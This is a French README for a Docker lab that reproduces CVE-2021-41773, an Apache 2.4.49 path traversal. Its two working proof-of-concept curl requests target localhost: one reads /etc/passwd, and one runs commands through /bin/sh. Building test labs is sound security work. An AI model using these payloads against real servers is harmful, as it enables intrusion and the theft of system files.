
# Laboratoire vulnérable basé sur Docker pour CVE-2021-41773, traversée de chemin Apache, fournissant des configurations de PoC pour la lecture de fichiers et l'exécution de code à distance dans un environnement contrôlé.
Cette vulnérabilité ne s'applique qu'à la version 2.4.49 qui possède des configurations non standard spécifiques. Dans certaines situations, cela peut entraîner une lecture de fichier ou une exécution de code.
https://twitter.com/ptswarm/status/1445376079548624899
Les conteneurs peuvent être tirés directement de Docker Hub en utilisant
docker pull blueteamsteve/cve-2021-41773:no-cgid
et exécutés en utilisant
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
Les journaux Apache peuvent être consultés avec la commande ci-dessous, ou vous pouvez simplement retirer le "-dit" de la commande d'exécution ci-dessus pour diffuser stdio
docker logs <container-id>
curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
Les conteneurs peuvent être tirés directement de Docker Hub en utilisant
docker pull blueteamsteve/cve-2021-41773:with-cgid
et exécutés en utilisant
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid
Les journaux Apache peuvent être consultés avec la commande ci-dessous, ou vous pouvez simplement retirer le "-dit" de la commande d'exécution ci-dessus pour diffuser stdio
docker logs <container-id>
curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'
Modifiez et construisez vos propres versions en utilisant le dockerfile et les fichiers httpd.conf modèles dans les sous-répertoires